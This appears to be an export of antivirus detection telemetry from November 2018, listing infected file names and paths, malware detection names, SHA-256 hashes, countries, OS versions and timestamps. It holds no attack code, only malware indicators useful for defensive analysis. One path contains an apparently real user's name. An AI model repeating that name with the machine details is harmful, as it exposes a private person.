  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152452-84249a9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04471ea5\\AVSCAN-20181101-152358-7BAB3610\\AVSCAN-20181101-152452-84249A9C', filesize=192000, name='X2000M/Laroux.B.#M1.#R1'), hash='58aeb835d15e94e4af50fa2805e63806c1c586cb5cac86067cdf28ab0d2c21f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdcamsetup.exe', filepath='C:\\Users\\X\\Documents\\Programs\\bdcamsetup.exe', filesize=17600000, name='W32/Virut.Gen.#M1.#R1'), hash='62e2ae62607f6c47921f45dccda776f9bce39b44644294f687eb79358063deec', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4100152, timestamp='2018-11-01T11:44:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_ba2e8a34.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_ba2e8a34.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsk9195.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:19:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160717-55cce896', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32ee4167\\AVSCAN-20181101-155117-C4BB2B44\\AVSCAN-20181101-160717-55CCE896', filesize=1024000, name='TR/Agent.7a0ca9.#M1.#R1'), hash='7a0ca978c03a0db12ffad1769e3b829118cdca74e4066e7e2ee83cf40cb53cf1', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='H:\\putty.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='77ce4135683e9eacca2bb102b4422901af013a53b50e242b875e2f0acbde0143', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T16:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agm.dll', filepath='G:\\Acrobat\\安装文件\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='9591fc48f13772e187d62420f7c8f05cb998785146d405ed8b1a9d9855c7531f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='menu .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\001\\menu\\menu .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9629aa09d30d97daf8a58f40a80366b17ce92c0d7d6bef5e444d6e249508baed', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\libgdxHTT\\52d76f2b\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='81c8c809d059ae0f1f1eafd80a6eea07173ffe18e4b309bb047bc69a535f285a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:06:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winzip32.exe', filepath='G:\\WinZip\\WINZIP32.EXE', filesize=3584000, name='W32/Virut.Gen.#M1.#R1'), hash='99c8dd7afc554a2073d581a035a554193b5fa1a101d4e8250f2981fb7cc95b52', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1822720, timestamp='2018-11-01T12:06:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\winsxs\\x86_microsoft-windows-ehome-ehshell_31bf3856ad364e35_6.1.7600.16385_none_3976c0515b3306e5\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='b8bf94369a7af12acc256eb2299eedc5092b1680efba25ffe713f59a31ea1430', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:23:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='546a2c8ffb305c22ea689d0d1bc9cc10f5c179e07f4ee703931e41939439c746', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\546A2C8FFB305C22EA689D0D1BC9CC10F5C179E07F4EE703931E41939439C746', filesize=188000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='546a2c8ffb305c22ea689d0d1bc9cc10f5c179e07f4ee703931e41939439c746', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:28:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000054-0515e9a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6b869d0\\AVSCAN-20181101-235218-991817B7\\AVSCAN-20181102-000054-0515E9A6', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T22:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='97f88ad98ddb4cacd3085d3cf91562434c924331f99c9eeb8b11583603d7937e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\97F88AD98DDB4CACD3085D3CF91562434C924331F99C9EEB8B11583603D7937E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='97f88ad98ddb4cacd3085d3cf91562434c924331f99c9eeb8b11583603d7937e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142441-cf5cf433', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-141936-BBE58BE8\\AVSCAN-20181101-142441-CF5CF433', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='723781da9dd34e794ac7e9f373408d9f8cc1c9f50fad6abc9d7368b3b2926654', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110529-d1173895', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110529-D1173895', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111607-21872765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111607-21872765', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c4e18b8671ccc1f9ba892713b0fbb1f592bdf4fdbedda079403ecdfe338517e0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C4E18B8671CCC1F9BA892713B0FBB1F592BDF4FDBEDDA079403ECDFE338517E0', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='c4e18b8671ccc1f9ba892713b0fbb1f592bdf4fdbedda079403ecdfe338517e0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090958-6a621d3d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-090941-66ACD280\\AVSCAN-20181101-090958-6A621D3D', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111551-1f97a90e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111551-1F97A90E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steamclient.dll', filepath="D:\\garry's mod\\Source Engine 2009\\bin\\steamclient.dll", filesize=512000, name='SPR/GameHack.#M1.#R1'), hash='1e736ee3d89ca094d5e435268a5fcf32cb633d8366cf1ff9d84564e152ab3401', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:59:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222552-52d7dce0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a1245b8e\\AVSCAN-20181101-222536-50942D9C\\AVSCAN-20181101-222552-52D7DCE0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9r8hh2f.exe', filepath='G:\\9r8hh2f.exe', filesize=128000, name='TR/PSW.Onlineg.wsoo.#M1.#R1'), hash='64a1191bd5a069931ccdcf4097811177c23d7f0952aa4782f9919b41a2bf092c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160655-3e0a406a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160645-3CD94395\\AVSCAN-20181101-160655-3E0A406A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='images.scr', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\br\\Help\\images\\images.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:16:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0002932.exe', filepath='E:\\System Volume Information\\_restore{DCA6017D-24FB-4935-8FDA-05DDE21E791F}\\RP2\\A0002932.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='31e4a0e71a3334913fa7bc86c8666ed4e8c752a64285fb93c0f897e0663f4dd7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='-__--___-_--_---_---_---_----_--_--_---_---__---_-_--_---.{c89e335e-3f41-40ba-add8-1d1cbf16100a}', filepath='f:\\\xa0\\-__--___-_--_---_---_---_----_--_--_---_---__---_-_--_---.{C89E335E-3F41-40BA-ADD8-1D1CBF16100A}', filesize=7648000, name='TR/Crypt.ZPACK.Gen4.#M300.#R300831'), hash='23edf66cb3d268321f401a1e995cb48615cc3f51f162722fad315163556a2245', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:50:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\febin mathew\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\JF5WFQ6N\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M0.#R0'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='8', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45ae3c2dbaf8116e25e249cbebb3d4f1080e0a36a19478a7ffd33293c850324c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\45AE3C2DBAF8116E25E249CBEBB3D4F1080E0A36A19478A7FFD33293C850324C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45ae3c2dbaf8116e25e249cbebb3d4f1080e0a36a19478a7ffd33293c850324c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b451f', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b451f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T12:36:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005250-77e811a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5cbd786b\\AVSCAN-20181102-005222-72B32570\\AVSCAN-20181102-005250-77E811A0', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='5d9e143b33ee81dbc877b631d537a656473b72cef25b09dbc16643d72eac13a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:52:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000056-3cb873e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c2d1c76\\AVSCAN-20181102-000031-386F608C\\AVSCAN-20181102-000056-3CB873E1', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0009102.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0009102.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15d338bf99bae1f263de5e5d1c950a9675b4bf490c40697a945509a54d8eec23', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX04.328\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX04.328\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:28:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002127-31c55ced', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002127-31C55CED', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2258.exe', filepath='I:\\.Trashes\\2258.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3645391cf6962cebfcf3de67643c4793f75874a16c758191672e77481948cd23', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\3645391CF6962CEBFCF3DE67643C4793F75874A16C758191672E77481948CD23', filesize=1920000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='3645391cf6962cebfcf3de67643c4793f75874a16c758191672e77481948cd23', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='client.xls', filepath='\\\\?\\D:\\PADS Projects\\Samples\\Scripts\\Layout\\samples\\sample2\\EXCEL97\\CLIENT.XLS', filesize=64000, name='EXP/HTML.Iframe.G.#M1.#R1'), hash='d9f9fb80049e4a28a95fd6aac3621bc18bb92c0cf4d41e018732a46260dcd54c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:18:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125541-6791fb69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a54a3c7\\AVSCAN-20181101-125443-5FDB160C\\AVSCAN-20181101-125541-6791FB69', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:55:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsh3924.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T02:27:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ipqhxcz05id\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540431164.5bd11d3ca04a7', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Capture\\59416348.exe', parentsize=670720, timestamp='2018-11-01T00:13:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194534-4237c682', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194534-4237C682', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212215-e05d6cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212215-E05D6CCE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hkufryvl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\HkUFRYvl.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\hrywq2sqfgh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13769584, timestamp='2018-11-01T16:41:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eed49d45c868374ff2c8ac5b0e773aefb0203173a7e39af1d28955b1d3f4c874', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\EED49D45C868374FF2C8AC5B0E773AEFB0203173A7E39AF1D28955B1D3F4C874', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eed49d45c868374ff2c8ac5b0e773aefb0203173a7e39af1d28955b1d3f4c874', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:34Z'), dt=datetime.date(2018, 11, 1)),
